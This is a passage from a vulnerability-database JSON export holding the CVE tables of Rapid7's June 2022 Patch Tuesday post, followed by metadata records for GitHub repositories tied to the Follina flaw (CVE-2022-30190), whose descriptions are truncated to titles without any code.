score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-22021](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22021>) | Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-2011](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2011>) | Chromium: CVE-2022-2011 Use after free in ANGLE | No | No | N/A | Yes \n[CVE-2022-2010](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2010>) | Chromium: CVE-2022-2010 Out of bounds read in compositing | No | No | N/A | Yes \n[CVE-2022-2008](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2008>) | Chromium: CVE-2022-2008 Out of bounds memory access in WebGL | No | No | N/A | Yes \n[CVE-2022-2007](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2007>) | Chromium: CVE-2022-2007 Use after free in WebGPU | No | No | N/A | Yes \n \n### Developer Tools vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-30184](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30184>) | .NET and Visual Studio Information Disclosure Vulnerability | No | No | 5.5 | Yes \n \n### ESU Windows vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-30140](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30140>) | Windows iSCSI Discovery Service Remote Code Execution Vulnerability | No | No | 7.1 | Yes \n[CVE-2022-30152](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30152>) | Windows Network Address Translation (NAT) Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2022-30135](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30135>) | Windows Media Center Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-30153](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30153>) | Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-30161](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30161>) | Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-30141](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30141>) | Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-30143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30143>) | Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-30149](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30149>) | Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-30146](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30146>) | Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-30155](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30155>) | Windows Kernel Denial of Service Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-30147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30147>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-30163](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30163>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 8.5 | Yes \n[CVE-2022-30142](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30142>) | Windows File History Remote Code Execution Vulnerability | No | No | 7.1 | Yes \n[CVE-2022-30151](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30151>) | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-30160](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30160>) | Windows Advanced Local Procedure Call Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-30166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30166>) | Local Security Authority Subsystem Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21166>) | Intel: CVE-2022-21166 Device Register Partial Write (DRPW) | No | No | N/A | Yes \n[CVE-2022-21127](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21127>) | Intel: CVE-2022-21127 Special Register Buffer Data Sampling Update (SRBDS Update) | No | No | N/A | Yes \n[CVE-2022-21125](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21125>) | Intel: CVE-2022-21125 Shared Buffers Data Sampling (SBDS) | No | No | N/A | Yes \n[CVE-2022-21123](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21123>) | Intel: CVE-2022-21123 Shared Buffers Data Read (SBDR) | No | No | N/A | Yes \n \n### Microsoft Office vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-30157](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30157>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-30158](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30158>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-30174](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30174>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.4 | Yes \n[CVE-2022-30159](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30159>) | Microsoft Office Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-30171](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30171>) | Microsoft Office Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-30172](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30172>) | Microsoft Office Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-30173](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30173>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n### SQL Server vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-29143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29143>) | Microsoft SQL Server Remote Code Execution Vulnerability | No | No | 7.5 | Yes \n \n### Windows vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-32230](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-32230>) | Windows SMB Denial of Service Vulnerability | No | No | N/A | Yes \n[CVE-2022-30136](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30136>) | Windows Network File System Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-30139](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30139>) | Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-30162](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30162>) | Windows Kernel Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-30165](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30165>) | Windows Kerberos Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-30145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30145>) | Windows Encrypting File System (EFS) Remote Code Execution Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-30148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30148>) | Windows Desired State Configuration (DSC) Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-30150](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30150>) | Windows Defender Remote Credential Guard Elevation of Privilege Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-30132](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30132>) | Windows Container Manager Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-30131](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30131>) | Windows Container Isolation FS Filter Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-30189](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30189>) | Windows Autopilot Device Management and Enrollment Client Spoofing Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-30154](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30154>) | Microsoft File Server Shadow Copy Agent Service (RVSS) Elevation of Privilege Vulnerability | No | No | 5.3 | Yes \n[CVE-2022-30164](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30164>) | Kerberos AppContainer Security Feature Bypass Vulnerability | No | No | 8.4 | Yes \n[CVE-2022-29111](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29111>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-22018](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22018>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-30188](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30188>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-29119](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29119>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-30167](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30167>) | AV1 Video Extension Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-30193](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30193>) | AV1 Video Extension Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n\u200b\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n_**Additional reading:**_\n\n * _[The Hidden Harm of Silent Patches](<https://www.rapid7.com/blog/post/2022/06/06/the-hidden-harm-of-silent-patches/>)_\n * _[Maximize Your VM Investment: Fix Vulnerabilities Faster With Automox + Rapid7](<https://www.rapid7.com/blog/post/2022/05/16/maximize-your-vm-investment-fix-vulnerabilities-faster-with-automox-rapid7/>)_\n * _[How to Strategically Scale Vendor Management and Supply Chain Security](<https://www.rapid7.com/blog/post/2022/04/26/how-to-strategically-scale-vendor-management-and-supply-chain-security/>)_\n * _[Analyzing the Attack Landscape: Rapid7\u2019s 2021 Vulnerability Intelligence Report](<https://www.rapid7.com/blog/post/2022/03/28/analyzing-the-attack-landscape-rapid7s-annual-vulnerability-intelligence-report/>) \n_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-14T19:37:50", "type": "rapid7blog", "title": "Patch Tuesday - June 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2007", "CVE-2022-2008", "CVE-2022-2010", "CVE-2022-2011", "CVE-2022-21123", "CVE-2022-21125", "CVE-2022-21127", "CVE-2022-21166", "CVE-2022-22018", "CVE-2022-22021", "CVE-2022-26937", "CVE-2022-29111", "CVE-2022-29119", "CVE-2022-29143", "CVE-2022-29149", "CVE-2022-30131", "CVE-2022-30132", "CVE-2022-30135", "CVE-2022-30136", "CVE-2022-30137", "CVE-2022-30139", "CVE-2022-30140", "CVE-2022-30141", "CVE-2022-30142", "CVE-2022-30143", "CVE-2022-30145", "CVE-2022-30146", "CVE-2022-30147", "CVE-2022-30148", "CVE-2022-30149", "CVE-2022-30150", "CVE-2022-30151", "CVE-2022-30152", "CVE-2022-30153", "CVE-2022-30154", "CVE-2022-30155", "CVE-2022-30157", "CVE-2022-30158", "CVE-2022-30159", "CVE-2022-30160", "CVE-2022-30161", "CVE-2022-30162", "CVE-2022-30163", "CVE-2022-30164", "CVE-2022-30165", "CVE-2022-30166", "CVE-2022-30167", "CVE-2022-30168", "CVE-2022-30171", "CVE-2022-30172", "CVE-2022-30173", "CVE-2022-30174", "CVE-2022-30177", "CVE-2022-30178", "CVE-2022-30179", "CVE-2022-30180", "CVE-2022-30184", "CVE-2022-30188", "CVE-2022-30189", "CVE-2022-30190", "CVE-2022-30193", "CVE-2022-32230"], "modified": "2022-06-14T19:37:50", "id": "RAPID7BLOG:36C78C12B88BFE8FEF93D8EF7A7AA553", "href": "https://blog.rapid7.com/2022/06/14/patch-tuesday-june-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-10-01T20:48:17", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-02T12:17:56", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-29T08:17:18", "id": "CA13A26D-7A19-511A-B059-BE9AEDA1F2E2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-21T12:08:07", "description": "# CVE-2022-30190 (Follina)\n\n![main.yml](https://github.com/winst...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-15T16:12:57", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-10-14T15:09:48", "id": "7FAB36AD-345E-5C1B-B259-20BF0E7DE97A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-10-02T02:11:29", "description": "# Five Nights at Follina's\nA Fullstack Academy Cybersecurity pro...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-01T16:47:50", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-05T16:10:38", "id": "A78746B7-318B-5981-A2EB-2D5BA5C26514", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-06T17:37:00", "description": "# CVE-2022-30190\n\n## Usag...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T10:13:16", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-06T16:59:02", "id": "74AB19DC-78DE-56B8-8EB3-DBFA48B17AD5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T23:09:18", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T18:17:38", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-18T07:34:31", "id": "E34732DA-6DCA-54FF-8A7A-C1CCE3D1B1DE", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-06T14:22:28", "description": "# Five Nights at Follina's\nA Fullstack Academy Cybersecurity pro...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-01T16:47:50", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-05T16:10:38", "id": "633FDFCF-0DF4-5FE6-B5DF-85F847D6D31E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-18T02:10:05", "description": "# Follina-CVE-2022-30190 Proof of Concept by Nee\n\n## Usage\n```ba...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-05T13:54:04", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-07-18T01:41:15", "id": "66A7ADCB-1EAD-519B-9B1F-5694A2860BA1", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-14T17:03:15", "description": "# Follina workaround (CVE-2022-30190)\n\n## Description\nThese two ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-08T14:20:50", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-08T14:29:37", "id": "F96D1468-D4E5-54F8-A03B-503ABF9BC416", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-31T15:00:46", "description": "# CVE-2022-30190(Follina)-PowerPoint-Version\n\nThis is CVE-2022-3...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-29T08:48:12", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-31T12:50:35", "id": "E6B6EDFD-3B78-58CA-B507-093047F89BB1", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-09-18T00:00:17", "description": "# Follina MS-MSDT exploitation with Spring Boot\n\nThis repository...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-07T22:46:23", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-17T23:25:27", "id": "B3146F3C-4919-564B-8B1E-752FCA30B8D9", "href": "", "cvss": {"score": 9.3, "vector": 